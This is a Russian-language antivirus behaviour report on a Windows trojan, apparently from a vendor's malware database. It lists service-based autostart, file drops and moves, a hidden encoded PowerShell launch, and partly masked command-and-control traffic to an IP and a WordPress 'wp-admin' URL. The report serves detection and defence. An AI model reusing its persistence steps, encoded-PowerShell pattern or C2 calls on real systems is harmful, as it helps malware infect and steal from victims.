Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\DxpTaskSync] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\DxpTaskSync] 'ImagePath' = '"%WINDIR%\SysWOW64\vccorlib110\DxpTaskSync.exe"'
Создает следующие сервисы
- 'DxpTaskSync' "%WINDIR%\SysWOW64\vccorlib110\DxpTaskSync.exe"
- 'DxpTaskSync' %WINDIR%\SysWOW64\vccorlib110\DxpTaskSync.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0ACAAdgAwADkAQQBuAGQAIAAoACAAIABbAFQAeQBQAEUAXQAoACIAewA2AH0AewA0AH0AewA1AH0AewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0ARgAnAHkAJwAsACcATQAnACwAJwBvAFIAJwAsACcALg...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\lmb_eqs\wkgepsv\p97mrnea.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\vccorlib110\dxptasksync.exe
Перемещает следующие файлы
- %HOMEPATH%\lmb_eqs\wkgepsv\p97mrnea.exe в %WINDIR%\syswow64\vccorlib110\dxptasksync.exe
Сетевая активность
Подключается к
- '15#.#1.33.137':443
TCP
Запросы HTTP GET
- http://www.10##db.com/wp-admin/Vf/
Запросы HTTP POST
- http://15#.##.33.137:443/rYuj16ffwcz25sH6/SzgwDEh7jjPycHAJxF/cj5Mcm/glbUDnge/dk5n5E6D8nuIVn8dKx/ via 15#.#1.33.137
UDP
- DNS ASK pu##o-0.org
- DNS ASK ma###aku.com
- DNS ASK 10##db.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\lmb_eqs\wkgepsv\p97mrnea.exe'
- '%WINDIR%\syswow64\vccorlib110\dxptasksync.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQB0ACAAdgAwADkAQQBuAGQAIAAoACAAIABbAFQAeQBQAEUAXQAoACIAewA2AH0AewA0AH0AewA1AH0AewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAgAC0ARgAnAHkAJwAsACcATQAnACwAJwBvAFIAJwAsACcALg...' (со скрытым окном)
